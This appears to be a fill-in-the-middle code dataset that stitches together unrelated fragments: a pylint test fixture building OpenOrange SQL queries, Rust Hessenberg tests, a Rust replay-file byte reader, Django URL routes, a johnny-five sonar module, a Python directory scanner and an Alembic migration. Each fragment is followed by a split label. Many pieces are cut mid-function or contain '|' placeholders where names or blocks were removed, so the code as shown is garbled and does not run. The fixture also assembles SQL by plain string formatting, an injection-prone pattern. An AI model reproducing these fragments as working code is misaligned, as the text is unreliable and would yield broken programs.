x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def | (self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| getExtra3 | identifier_name |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status
x = "'%s' as test_date\n, " % date("")
x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
|
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList)
| lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis) | conditional_block |
func_noerror_query_getattr.py | # pylint:disable=R0201
from OpenOrange import *
from Document import Document
from Label import Label
from SQLTools import codeOrder, monthCode
from datetime import datetime
class AlotmentDoc(Document):
classattr = "classattr"
def getRecorda(self):
class newObj(object):
Status = 1
RootLabel = "100"
SerNr = "SerNr"
Labels = "100,200"
TransDate = datetime.now().date()
def name(self):
return "Alotment"
return newObj()
def getExtra(self, val1, val2="2", val3="3", val4=4):
specs = self.getRecorda()
sql = "WHERE?AND [al].{%s} IN ('%s')\n" % ("SerNr", "','".join([val1, val3, val2]))
sql += "WHERE?AND [al].{SerNr} = i|%i|\n" % specs.Status
sql += "WHERE?AND [al].TransDate < d|%s|\n" % specs.TransDate
sql += "WHERE?AND SerNr = "
if specs.Status == 1:
sql += "%s" % val4
if 1 in [0, 0]:
pass
else:
sql += ""
return sql
def getExtra2(self, test):
parent = self
specs = self.getRecorda()
mydict = {1:1, 2:2}
mylist = [1, 2]
listcomp = "listcomp," + "extra"
if test > 0:
return specs.Status | x += "'%s' as test_time\n, " % time("")
x += "'%i' as test_len\n, " % len(specs.RootLabel)
x += "'%s' as test_map\n, " % "','".join(map(str, mylist))
x += "'%s' as test_keys\n, " % "','".join(mydict.keys())
x += "'%s' as test_subscript\n," % ["SerNr","RoomType"][specs.Status]
#x += "'%s' as test_classattr\n, " % self.classattr
x += '"%s" as test_dic\n, ' % mydict
x += "'%s' as test_parentattr\n, " % parent.record #Parent None attribute
x += '"%s" as test_binoplist\n, ' % mylist #+ mylist
x += '"%s" as test_listcomp1\n, ' % "".join([a.strip() for a in listcomp.split(',')])
x += '"%s" as test_listcomp2\n, ' % "".join([d for d in listcomp])
x += '"%s" as test_listcomp3\n, ' % "".join([str(b) for b in listcomp])
x += '"%s" as test_listcomp4\n,' % "".join([c.strip() for c in listcomp])
x += '"%s" as test_listcomp5\n,' % [('s|%s|') % (z) for z in mylist]
x += '"%s" as test_listcomp6\n,' % "".join([y for y in ("a", "b")])
# pylint:disable=E1101
x += '"%s" as inferenceErr\n,' % self.non.existant
x += '"%s" as indexErr\n' % mylist[2]
return x
def getExtra3(self):
specs = self.getRecorda()
subquery = Query()
subquery.sql = "SerNr"
return "ORDER BY %s, %s" % (specs.SerNr, subquery.sql)
def getExtra4(self):
specs = self.getRecorda()
labels = None
if specs.Labels:
lis = []
labs = specs.Labels.split(",")
for lb in labs:
lis.append("','".join(Label.getTreeLeaves(lb)))
labels = "','".join(lis)
return "WHERE?AND SerNr IN ('%s') " % labels
def getExtra5(self, txt):
txt = txt.replace(":1","RoomType IS NULL\n")
return txt
def getExtra6(self):
txt = ""
q = {}
q["one"] = Query()
q["one"].sql = "WHERE?AND SerNr IS NULL\n"
q["two"] = Query()
q["two"].sql = "WHERE?AND SerNr IS NOT NULL\n"
slist = ["one", "two"]
for index in slist:
txt += q[index].sql
return txt
def getExtra7(self):
specs = self.getRecorda()
factor = 0.0
if 1 > 0:
factor = (float(specs.Status) / float(specs.Status))
txt = "WHERE?AND (%s / 1) * %s > 0\n" % (1, factor)
return txt
def run(self):
specs = self.getRecorda()
leaves = Label.getTreeLeaves(specs.RootLabel)
query7 = Query()
query7.sql = "SELECT SerNr, %s,\n" % codeOrder("SerNr", leaves)
query7.sql += monthCode("[al].TransDate")
query7.sql += "\n, %s, \n" % self.getExtra2(test=1)
query7.sql += self.getExtra2(0)
query7.sql += "\nFROM %s al\n" % specs.name()
query7.sql += self.getExtra("1", "2", val3="33")
query7.sql += self.getExtra4()
query7.sql += self.getExtra5("WHERE?AND :1")
query7.sql += self.getExtra6()
query7.sql += self.getExtra7()
method = getattr(self, "getExtra3____"[:-4])
query7.sql += method()
query7.open()
self.run2([100, 200])
def run2(self, extraList):
query2 = Query()
query2.sql = self.getMore(extraList)
query2.open()
def getMore(self, moreList):
return "SELECT * FROM Alotment WHERE SerNr IN ('%s')" % "','".join(moreList) | x = "'%s' as test_date\n, " % date("") | random_line_split |
hessenberg.rs | use std::cmp;
use nl::Hessenberg;
use na::{DMatrix, Matrix4};
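// Property checked by both tests below: the Hessenberg factors must
// reconstruct the input, i.e. m = p * h * p.transpose() up to eps = 1.0e-7.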
quickcheck!{
fn hessenberg(n: usize) -> bool {
if n != 0 {
let n = cmp::min(n, 25);
let m = DMatrix::<f64>::new_random(n, n);
match Hessenberg::new(m.clone()) {
Some(hess) => {
let h = hess.h();
let p = hess.p();
relative_eq!(m, &p * h * p.transpose(), epsilon = 1.0e-7)
},
None => true
}
}
else {
true
}
}
fn hessenberg_static(m: Matrix4<f64>) -> bool {
match Hessenberg::new(m) {
Some(hess) => {
let h = hess.h();
let p = hess.p();
| }
}
} | relative_eq!(m, p * h * p.transpose(), epsilon = 1.0e-7)
},
None => true | random_line_split |
mpq.rs |
use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result:
// 11011010100010101000001001101
// 1101101010001
fn sp(){
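    // Copy each 2-byte half of the 4-byte magic into the low bytes of a
    // zeroed u32 so that each pair can be printed as a single integer below.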
let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() | {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | identifier_body |
|
mpq.rs |
use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result:
// 11011010100010101000001001101
// 1101101010001
fn | (){
let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | sp | identifier_name |
mpq.rs | use std::fs::File;
use std::io::Read;
use std::ptr::copy_nonoverlapping;
// Result: | let bytes: [u8; 4] = [77, 80, 81, 27];
let buf_a: [u8; 2] = [77, 80];
let buf_b: [u8; 2] = [81, 27];
let mut num_a: u32 = 0;
let mut num_b: u32 = 0;
unsafe {
copy_nonoverlapping(buf_a.as_ptr(), &mut num_a as *mut u32 as *mut u8, 2);
copy_nonoverlapping(buf_b.as_ptr(), &mut num_b as *mut u32 as *mut u8, 2);
}
println!("SP Bits: {:16b} {:16b}", num_a.to_le(), num_b.to_le());
}
fn main() {
sp();
let mut f: File = File::open("test.replay").unwrap();
let mut buf = [0u8; 4];
let size = f.read(&mut buf).unwrap();
let mut data: u32 = 0;
unsafe {
copy_nonoverlapping(buf.as_ptr(), &mut data as *mut u32 as *mut u8, 4)
}
let bits = data.to_le();
let _string = std::str::from_utf8(&buf).unwrap().to_owned();
println!("String: {:?} ", _string );
println!("Bytes: {:?} Size: {:?}", buf, size);
println!("U32: {:?} Bits: {:b}", bits, bits );
} | // 11011010100010101000001001101
// 1101101010001
fn sp(){ | random_line_split |
urls.py | # This file is part of django-doubleoptin-contactform.
# django-doubleoptin-contactform is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# django-doubleoptin-contactform is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with Foobar. If not, see <http://www.gnu.org/licenses/>.
from django.conf.urls.defaults import *
from django.views.generic.simple import direct_to_template
urlpatterns = patterns('',
(r'^$', 'doptincf.views.contact'),
(r'^received/$', direct_to_template, {'template': 'contact/received.html'}), | ) | (r'^(?P<contact_id>\d+)/verify/$', 'doptincf.views.verify'),
    (r'^verified/$', direct_to_template, {'template': 'contact/verified.html'}), | random_line_split
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) |
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
    // Store this median value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null; | identifier_body |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) {
if ( !(this instanceof Sonar) ) |
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
    // Store this median value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| {
return new Sonar( opts );
} | conditional_block |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function | ( opts ) {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data );
}.bind(this));
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
    // Store this median value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/
| Sonar | identifier_name |
sonar.js | var Board = require("../lib/board.js"),
events = require("events"),
util = require("util");
/**
* Sonar
* @constructor
*
* @param {Object} opts Options: pin (analog)
*/
function Sonar( opts ) {
if ( !(this instanceof Sonar) ) {
return new Sonar( opts );
}
var median, last, samples;
median = 0;
last = 0;
samples = [];
// Initialize a Device instance on a Board
Board.Device.call(
this, opts = Board.Options( opts )
);
// Sonar instance properties
this.freq = opts.freq || 100;
this.voltage = null;
// Set the pin to ANALOG mode
this.mode = this.firmata.MODES.ANALOG;
this.firmata.pinMode( this.pin, this.mode );
this.firmata.analogRead( this.pin, function( data ) {
this.voltage = data;
samples.push( data ); |
// Throttle
setInterval(function() {
var err;
err = null;
// Nothing read since previous interval
if ( samples.length === 0 ) {
return;
}
median = samples.sort()[ Math.floor( samples.length / 2 ) ];
// Emit throttled event
this.emit( "read", err, median );
// If the median value for this interval is not the same as the
// median value in the last interval, fire a "change" event.
//
if ( last && median && (median.toFixed(1) !== last.toFixed(1)) ) {
this.emit( "change", err, median );
}
    // Store this median value for comparison
// in next interval
last = median;
// Reset samples;
samples.length = 0;
}.bind(this), this.freq );
Object.defineProperties( this, {
// Based on the voltage,
// Calculate the distance in inches and centimeters
inches: {
get: function() {
return +(( 254 / 1024 ) * 2 * median).toFixed(1);
}
},
cm: {
get: function() {
return +(( median / 2 ) * 2.54).toFixed(1);
}
}
});
}
util.inherits( Sonar, events.EventEmitter );
module.exports = Sonar;
// Reference
//
// http://www.maxbotix.com/tutorials.htm#Code_example_for_the_BasicX_BX24p
// http://www.electrojoystick.com/tutorial/?page_id=285
// Tutorials
//
// http://www.sensorpedia.com/blog/how-to-interface-an-ultrasonic-rangefinder-with-sensorpedia-via-twitter-guide-2/ | }.bind(this)); | random_line_split |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x) |
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
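  # Recursively collect the absolute paths of files under `directory` into the
  # caller-supplied `files` list, optionally keeping only extensions in `l_ext`.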
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs] | random_line_split |
|
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
|
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower() | identifier_body |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def | (fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
try:
scan_dir(srcname, files, l_ext)
except:
continue
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| good_ext | identifier_name |
files.py | # -*- coding: utf-8 -*-
"""
equip.utils.files
~~~~~~~~~~~~~~~~~
:copyright: (c) 2014 by Romain Gaucher (@rgaucher)
:license: Apache 2, see LICENSE for more details.
"""
import os
__normalize_path = lambda x: os.path.abspath(x)
def file_extension(filename):
if '.' not in filename:
return None
return filename[filename.rfind('.') + 1:].lower()
def good_ext(fext, l=None):
return fext.lower() in l if l else False
def scan_dir(directory, files, l_ext=None):
names = os.listdir(directory)
for name in names:
srcname = __normalize_path(os.path.join(directory, name))
try:
if os.path.isdir(srcname):
|
elif os.path.isfile(srcname) \
and (not l_ext \
or good_ext(srcname[srcname.rfind('.')+1:], l_ext)):
if srcname not in files:
files.append(srcname)
except IOError, error:
continue
def list_dir(directory):
subdirs = os.listdir(directory)
if not subdirs:
return []
return [os.path.join(directory, k) for k in subdirs]
| try:
scan_dir(srcname, files, l_ext)
except:
continue | conditional_block |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default |
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def upgrade():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone') |
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
} | random_line_split |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
op.get_context().connection.execute('PRAGMA foreign_keys=ON;')
utcnow_server_default = "(datetime('now', 'utc'))"
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
if column_info['default'] == "datetime('now', 'utc')":
column_info['default'] = utcnow_server_default
sqlite_reflect_kwargs = {
'listeners': [('column_reflect', sqlite_column_reflect_listener)]
}
# ===========================================================================
# HOWTO: Handle alter statements in SQLite
#
# def upgrade():
# if is_sqlite:
# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:
# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)
# else:
# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)
#
# ===========================================================================
def | ():
op.add_column('indie_studio', sa.Column('contact_phone', sa.Unicode(), server_default='', nullable=False))
op.add_column('indie_studio', sa.Column('show_info_updated', sa.Boolean(), server_default='False', nullable=False))
def downgrade():
op.drop_column('indie_studio', 'show_info_updated')
op.drop_column('indie_studio', 'contact_phone')
| upgrade | identifier_name |
53b71e7c45b5_add_fields_for_mivs_show_info_checklist_.py | """Add fields for MIVS show_info checklist item
Revision ID: 53b71e7c45b5
Revises: ad26fcaafb78
Create Date: 2019-11-25 19:37:15.322579
"""
# revision identifiers, used by Alembic.
revision = '53b71e7c45b5'
down_revision = 'ad26fcaafb78'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
try:
is_sqlite = op.get_context().dialect.name == 'sqlite'
except Exception:
is_sqlite = False
if is_sqlite:
|
else:
utcnow_server_default = "timezone('utc', current_timestamp)"
def sqlite_column_reflect_listener(inspector, table, column_info):
"""Adds parenthesis around SQLite datetime defaults for utcnow."""
